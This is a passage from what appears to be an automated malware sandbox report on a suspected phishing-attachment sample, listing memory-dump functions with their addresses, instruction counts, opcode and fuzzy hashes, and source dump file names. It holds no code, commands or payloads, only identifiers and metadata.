Opcode ID: 6aeef278a135b0fad6455ba08621427c25f6262336c0490c7ca154cbd0b2c736
Instruction ID: 88a6382796ce5ceec75d16b8c6cd54267d879a46e4cf20dc5578b873c5a07495
Opcode Fuzzy Hash: 6aeef278a135b0fad6455ba08621427c25f6262336c0490c7ca154cbd0b2c736
Instruction Fuzzy Hash: 57F01E34A042188FCB20CFA8D944BDDBBB0FB18300F1081AAD449AB248E7710A409F00

Uniqueness

Uniqueness Score: -1.00%

Function 046A76A2 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea8e9a00c573fd6943c2bdc3b53b45c5aea7fd4f6b8cc201d8215cfb3d8d1618
Instruction ID: b8bc44d1d4664f387b4c4c9cccea193ff01dc7f84c8f5393a4ed90e0a96c3de2
Opcode Fuzzy Hash: ea8e9a00c573fd6943c2bdc3b53b45c5aea7fd4f6b8cc201d8215cfb3d8d1618
Instruction Fuzzy Hash: 00E0B670E04A08DFDB19CF59E484A9CBBF2FF59701F488565E14AD7251E734A851CE01

Uniqueness

Uniqueness Score: -1.00%

Function 046A8788 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0a28207eab6480a4011c230f834055bb0d58d7c4e4c80d2c2dab8900661b526
Instruction ID: 23ef733a2b29a8b016eeb7fc55e9a99483e34c103b56fb07201867b2992668f3
Opcode Fuzzy Hash: d0a28207eab6480a4011c230f834055bb0d58d7c4e4c80d2c2dab8900661b526
Instruction Fuzzy Hash: A6E01271A0124CEFC714DFA5E50165DB7F5EB44300F508599D808D7305EA319F019791

Uniqueness

Uniqueness Score: -1.00%

Function 01EFE1B3 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9a9614235247676408ca5cfff782ddbe349ab072c0adebf7a4b1949af84065c
Instruction ID: f0eddb111fa126d184e705c2e126b9bf51916fef0e5335a4508779bfdb18a5ee
Opcode Fuzzy Hash: f9a9614235247676408ca5cfff782ddbe349ab072c0adebf7a4b1949af84065c
Instruction Fuzzy Hash: DEE0863490529CCBD7518F64DC087EEBE71FB48344F40909ED95967290DB780A84DF04

Uniqueness

Uniqueness Score: -1.00%

Function 01EFDD0C Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93a393a13aa11a35eba4a4e5ea644ff4ae4905fc1411ad3b6148734e86343a88
Instruction ID: b9331762deed9199f6e82d7b755cb901365872876bbe0cd4f1ec621408fde8a1
Opcode Fuzzy Hash: 93a393a13aa11a35eba4a4e5ea644ff4ae4905fc1411ad3b6148734e86343a88
Instruction Fuzzy Hash: C6E08630A0521CCBEB619FA4D8543DD7EB1FB45344F1090ADC64966290CB790AC5DF14

Uniqueness

Uniqueness Score: -1.00%

Function 01EFE46F Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d3cf17de5f95a6c59719160c72358e6f44447d0636ec87a0ba6c970bc5d5002
Instruction ID: b9c774e392bcbc2da6de0d30bac9a0293247ba25a2ad876586b8cc791dc32c03
Opcode Fuzzy Hash: 2d3cf17de5f95a6c59719160c72358e6f44447d0636ec87a0ba6c970bc5d5002
Instruction Fuzzy Hash: B1E0C974A44259CFDB519F60DC9C7A8BB75FB45345F0042EA940A6B2A2CB701E85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 01F1DD20 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d584c3236d2e85c73908d0280452d45622a6f2f66c2fa26b630e0378778611ba
Instruction ID: 4be098eed6b586dcf73b058dc162252704e5f2d630f502084a2e20b6b6da83a1
Opcode Fuzzy Hash: d584c3236d2e85c73908d0280452d45622a6f2f66c2fa26b630e0378778611ba
Instruction Fuzzy Hash: E7D05E35700B469B8B26963EA61015E76E15FC56203004A28D496C6688EE20DC424B46

Uniqueness

Uniqueness Score: -1.00%

Function 046A764C Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4ead3bb7441e8f97e5c727c4ff41c88620d7afb0318ca2751d54626adc4ca1c
Instruction ID: f9ea509ea0ae12f174b0793ab3e0b273bd4991873926c7eff6680d3d2fb97134
Opcode Fuzzy Hash: e4ead3bb7441e8f97e5c727c4ff41c88620d7afb0318ca2751d54626adc4ca1c
Instruction Fuzzy Hash: 28E04F74A01128CFD725EF64D9557ADB7B6EB49300F4081A9DA0EA7392CB345F46CF40

Uniqueness

Uniqueness Score: -1.00%

Function 046A78F9 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc7ea2692f28450f8b872458da5edf3cbc8853bf3e22811b4be3de5e640d5a69
Instruction ID: c97cd818266cbe521f479de7dd6da75c03a9d6f8c078f54215563bf90c8fc721
Opcode Fuzzy Hash: dc7ea2692f28450f8b872458da5edf3cbc8853bf3e22811b4be3de5e640d5a69
Instruction Fuzzy Hash: 2FE01274A00368CFCB25EFA4D85879DB7B1FBC8305F0002AAA40AAB390CB741E84CF11

Uniqueness

Uniqueness Score: -1.00%

Function 046A78A3 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1108a9dfcc7d7e8b460d283a5267734ab91aec0d6d3dfa3dd4827ce7d0e60138
Instruction ID: 9cf981dad27b8463ba336407dd66f6e2e358c1619d123f23f04a356e2ecd53d2
Opcode Fuzzy Hash: 1108a9dfcc7d7e8b460d283a5267734ab91aec0d6d3dfa3dd4827ce7d0e60138
Instruction Fuzzy Hash: EDE04F34A0062ACBC72DEF54DD55BAEB7B1FB88701F0002A9D90AA7794EB301E809F01

Uniqueness

Uniqueness Score: -1.00%

Function 046A7980 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39b3895c9dc24ead996baa613a5c19efd931cf875a9390117bbabf7f9fe87a39
Instruction ID: b4e0f41d7c419e7afd6550526aa69412e4ad7bc31bba50635c1054ed9b78a783
Opcode Fuzzy Hash: 39b3895c9dc24ead996baa613a5c19efd931cf875a9390117bbabf7f9fe87a39
Instruction Fuzzy Hash: E2E04F34A002A8CFC769EFA4DC5479D7772FB88301F0042A9941DAB391DB301E808F10

Uniqueness

Uniqueness Score: -1.00%

Function 001E0C90 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b56784565ddbd6617bdb2098910e76ab974479864ee372acbea1720a35fa2bd
Instruction ID: 9110a776c1cb5db1ff4438b67038d845aaddd898853ab3d72e2b429265e446ef
Opcode Fuzzy Hash: 8b56784565ddbd6617bdb2098910e76ab974479864ee372acbea1720a35fa2bd
Instruction Fuzzy Hash: ADD05B71A0130CEFCB44DFB8D90155D77F5DB4830575045A9D418D7314DB319F049B80

Uniqueness

Uniqueness Score: -1.00%

Function 01EF3F4A Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c04da45ea41f8c9a7f16a570238a56b6763d25c204ce9b5fac9e9d6a04ead279
Instruction ID: a975663717ea783645e43487677509371ed52dd8aa2942072295458bd25706bc
Opcode Fuzzy Hash: c04da45ea41f8c9a7f16a570238a56b6763d25c204ce9b5fac9e9d6a04ead279
Instruction Fuzzy Hash: 55D0A771900342ABCF4193B4651415D3FB57F95274794435E9E5D831E5E911C841C610

Uniqueness

Uniqueness Score: -1.00%

Function 01EF3F58 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbb5149c18a592f52541f0cf81450103737f1a336230e762019425ebcb7fbc13
Instruction ID: 1d836e838260e3a563a4aa6661c0e70e2e7baf1ac379cef3b6260a0ff4a3211e
Opcode Fuzzy Hash: cbb5149c18a592f52541f0cf81450103737f1a336230e762019425ebcb7fbc13
Instruction Fuzzy Hash: FEC08C3130430AABEF0197F8B90412A3BEDAB882587D88468FE0DC3A41FE22EC41C190

Uniqueness

Uniqueness Score: -1.00%

Function 046A2B89 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 398b1286490eaa5698e65a581455d31039cae54111f49becfe4709b6900f507e
Instruction ID: f01112cbc3881fa21c50c08cb325dacca761144a432d6fc21e332195b539984f
Opcode Fuzzy Hash: 398b1286490eaa5698e65a581455d31039cae54111f49becfe4709b6900f507e
Instruction Fuzzy Hash: 23E012B0A02228CFDB61CF60DC48B99BBB0BB04300F0014EAC009A22A0EB302F85EF04

Uniqueness

Uniqueness Score: -1.00%

Function 01EF3F88 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8b07ce26cb710bf74f46a525b7fce13216c5a93a35d179da75d010c7221d47e
Instruction ID: 449067856109ce532ef3804ffe9d6dd295b97ecf349ffc6c5831ba03b935358e
Opcode Fuzzy Hash: c8b07ce26cb710bf74f46a525b7fce13216c5a93a35d179da75d010c7221d47e
Instruction Fuzzy Hash: 3BD0A730A40204AFCB449774E81415D37F19FC92343100218D85EC76F2DF7588828A00

Uniqueness

Uniqueness Score: -1.00%

Function 01EF3F50 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3119635d5359f0e6d448e1b815832cdf50ab5897c5d2327d40fabf6c17ff697a
Instruction ID: e72b83a475fc4fe41651d6545343137ffbb2a924dc1b43af038eb57b4156d034
Opcode Fuzzy Hash: 3119635d5359f0e6d448e1b815832cdf50ab5897c5d2327d40fabf6c17ff697a
Instruction Fuzzy Hash: E6D022B0B00202BBCF06AF20E1040AA3FB8BF442E83A0802DA908C7641FB33CC018980

Uniqueness

Uniqueness Score: -1.00%

Function 058CCE10 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ac642c4f8f4d8e254bbeba3d1a75e29a39a657c80b1618d6fbef52f898c2ee6
Instruction ID: 7a6d206381a6e4615d68bfeb656bf754434b31762d17fdd36928bf5de49655c0
Opcode Fuzzy Hash: 8ac642c4f8f4d8e254bbeba3d1a75e29a39a657c80b1618d6fbef52f898c2ee6
Instruction Fuzzy Hash: DDC08C2008A6088AC2201788FE5C33A3A8CA30B30AF802684884D808A24B308C40C140

Uniqueness

Uniqueness Score: -1.00%

Function 01EFD1A5 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e7436e61c0f4eba600a6db7c293dfabaf02297ccb898409039f79c8d0b46553
Instruction ID: 04f37ddf5fab37185ce92461c4e678ef7e9b9e0990d31b249d40cad0784a8bfa
Opcode Fuzzy Hash: 2e7436e61c0f4eba600a6db7c293dfabaf02297ccb898409039f79c8d0b46553
Instruction Fuzzy Hash: 8ED05E34A0426CCBC7519F60D8203D97AB1EB45340F1080A9C54966294CA390A809F10

Uniqueness

Uniqueness Score: -1.00%

Function 01EF3F90 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 563b2d33610111e23afc370866ff9b1464d138207a64b52fa66ba2eac641c8d4
Instruction ID: a91027b8b29334825c0e49d7efc6d5260f26f45948629765eb2979fe80081c1d
Opcode Fuzzy Hash: 563b2d33610111e23afc370866ff9b1464d138207a64b52fa66ba2eac641c8d4
Instruction Fuzzy Hash: 0FC08C30700348AFCB05ABB8EC1812A37EAAFCC3113500028E80E87B52DFB2ECC28641

Uniqueness

Uniqueness Score: -1.00%

Function 01EF11F2 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eca2eb741368b1f307ba25c22036a92befe41646232a244bd68e15096eeb9694
Instruction ID: 29de3dea96a71599b329f4797b6ba4ffd0313c053ea28781a44b9544f0f2a302
Opcode Fuzzy Hash: eca2eb741368b1f307ba25c22036a92befe41646232a244bd68e15096eeb9694
Instruction Fuzzy Hash: 08D0C975044248DFCB40DB68D8448187B64EF1926071640D6F6044B232D27299A09B81

Uniqueness

Uniqueness Score: -1.00%

Function 01F1A798 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5d4d79c41cebee46d1445ff4b016ee458c1c6fe28febd0e9f9fe40cd15a82bc
Instruction ID: b0cdde96273b6c7937bb4f22a994e403ecf4aae60c73dbe2832a18aec7994d0b
Opcode Fuzzy Hash: f5d4d79c41cebee46d1445ff4b016ee458c1c6fe28febd0e9f9fe40cd15a82bc
Instruction Fuzzy Hash: B7D09E78F05328CFDB10DF14EC94B89B7B2BB45304F008199D80967358D7755984CF11

Uniqueness

Uniqueness Score: -1.00%

Function 01EF40F2 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6614d54f58e20f768831819ce8bc28f615dbd52f405f368bbf7075c10b9aee6
Instruction ID: 8317560eb5236831ccce299c2220ca7871b57fcada2ecd111098fbc86d230b54
Opcode Fuzzy Hash: a6614d54f58e20f768831819ce8bc28f615dbd52f405f368bbf7075c10b9aee6
Instruction Fuzzy Hash: B0C012B65411408FD705DB108985449B711DB6023870486AD89354A2E6DE229503C615

Uniqueness

Uniqueness Score: -1.00%

Function 01F1AF70 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 395d0f6c21ae228e57bb49847c02d7b59b1c270177410e7e35b5ba9511d5f2c9
Instruction ID: 71181fe07683247146afca35023e72d71738b2d8648fc65c4ea2439f8e18ec57
Opcode Fuzzy Hash: 395d0f6c21ae228e57bb49847c02d7b59b1c270177410e7e35b5ba9511d5f2c9
Instruction Fuzzy Hash: 34C04C76E1011DABCF10DBD9F4518DCF774EF94325F004036D214A7104D6311926CF55

Uniqueness

Uniqueness Score: -1.00%

Function 01EF1200 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af8e06a732ca707132f27ef7a83e288a845aad2dfe2584e40d54ff240b01922d
Instruction ID: 2ad57114494cc740969b95bee8f444b209d5990da35e5c480c7824bf6c3857fe
Opcode Fuzzy Hash: af8e06a732ca707132f27ef7a83e288a845aad2dfe2584e40d54ff240b01922d
Instruction Fuzzy Hash: B7C09276140208EFC700DF69E844C45BBB8FF1976071180A1FA088B332C732E820DA94

Uniqueness

Uniqueness Score: -1.00%

Function 046AA040 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18b83e36c682f6a5717e28ebd0e33bc7c7a62bb7459d73978114b926da7619a5
Instruction ID: f36bdf2114eee7525847bdd6b07a091a38c23bbcac45327e17778cdb3f34f542
Opcode Fuzzy Hash: 18b83e36c682f6a5717e28ebd0e33bc7c7a62bb7459d73978114b926da7619a5
Instruction Fuzzy Hash: CAC02B7090420457DF22A7B1994A35837101B11308F30008CD000090C69087140FC247

Uniqueness

Uniqueness Score: -1.00%

Function 046A7957 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e338ecb4c3cfbd3f450f1ba89d54a3bfb38e6f53a9b0ebdc67edbcc6f8ba07a1
Instruction ID: d1657c32989fc492e9c2ee39a92df8b576e1853ab7aa261bf47c2e60092c8f75
Opcode Fuzzy Hash: e338ecb4c3cfbd3f450f1ba89d54a3bfb38e6f53a9b0ebdc67edbcc6f8ba07a1
Instruction Fuzzy Hash: BDC08C3030810CC7D30A6B60EA2479E3231F740700F840239500247195CBB85D05AA10

Uniqueness

Uniqueness Score: -1.00%

Function 058CF188 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94

Uniqueness

Uniqueness Score: -1.00%

Function 01EF32C0 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d192f105f2a63daeadaf4bdcd2cb48c4511685fff028baef41f0f9a53f2feedb
Instruction ID: 2077dbc0ec42c98d16fb7627cda9071a86656c5d0659ccf462ee5819cdb52de0
Opcode Fuzzy Hash: d192f105f2a63daeadaf4bdcd2cb48c4511685fff028baef41f0f9a53f2feedb
Instruction Fuzzy Hash: 1AB09232000208AB86019B84ED04C56BB69AB597007008025E609065218B72E862DA94

Uniqueness

Uniqueness Score: -1.00%

Function 01EF3FD0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c0c6e45af2e58ac328067f4884fa5f6f1b8c2a7c7e34487ddd0d8c75a1331fc
Instruction ID: 7ace320a41b2dae9939d7b9aace9fff304bbf463b6866d49217217353c0e75bc
Opcode Fuzzy Hash: 3c0c6e45af2e58ac328067f4884fa5f6f1b8c2a7c7e34487ddd0d8c75a1331fc
Instruction Fuzzy Hash: 84A012300002089B85005744EC05411B79C974A6043008054E40D025124B62F8418580

Uniqueness

Uniqueness Score: -1.00%

Function 046AA048 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b1ea228e0269eba742d4bc80b4ed8c0baf25e69e0ef54fe8ae73bfd78b51944
Instruction ID: 07cdf1de968253fe62c7801c7c536bc142fca0da171beff06a4884db0012b11d
Opcode Fuzzy Hash: 0b1ea228e0269eba742d4bc80b4ed8c0baf25e69e0ef54fe8ae73bfd78b51944
Instruction Fuzzy Hash: 7FA02238F002008FEF20BEE2B00E3BC3C00830A300F0000C2AF0A0C2CE80A08C00CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 01F1DD08 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09899df0b3dede3e5b2e90ef0ab193b6065ca958e94b26d82980530df5f32ef0
Instruction ID: e6f829193b93c23a0c4691df87455e5d2753df5b4e0dbcc98b81ba7f2417e1d4
Opcode Fuzzy Hash: 09899df0b3dede3e5b2e90ef0ab193b6065ca958e94b26d82980530df5f32ef0
Instruction Fuzzy Hash: 18A0021948D1A2075705B362A190465AB031AA14483D8078CC2410055385CA5665D9D2

Uniqueness

Uniqueness Score: -1.00%

Function 046AA8E8 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92766f4f3268e6092dc7a8e32844122a3f103a09c62b2604d85a144eca65f837
Instruction ID: a5e2a0506f5e89a9b66c72c80a9b073e38911c784e966c67ce8e07065509e337
Opcode Fuzzy Hash: 92766f4f3268e6092dc7a8e32844122a3f103a09c62b2604d85a144eca65f837
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004CE628 Relevance: 3.9, Strings: 3, Instructions: 165COMMON

Download Yara Rule

Strings

4'p, xrefs: 004CE6DE
DB, xrefs: 004CE698
4'p, xrefs: 004CE709

Memory Dump Source

Source File: 00000000.00000002.356255959.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 4'p$4'p$DB
API String ID: 0-2170722040
Opcode ID: dac3eaad0170b8ea966877b172736f6ab4a62e5d03a83be22d9afa4bb1e96e13
Instruction ID: 5913745e37a97084d0923eed5eece17564ecbefb2f19cf6ae0c4da5576f3095e
Opcode Fuzzy Hash: dac3eaad0170b8ea966877b172736f6ab4a62e5d03a83be22d9afa4bb1e96e13
Instruction Fuzzy Hash: 86613BB1E012888BD759EF6AF88168EBBF3FFD8300F14C52AD0449F269DB3959459B50

Uniqueness

Uniqueness Score: -1.00%

Function 046AC6B0 Relevance: 2.8, Strings: 2, Instructions: 334COMMON

Download Yara Rule

Strings

(p, xrefs: 046ACA5C
,p, xrefs: 046AC7AE

Memory Dump Source

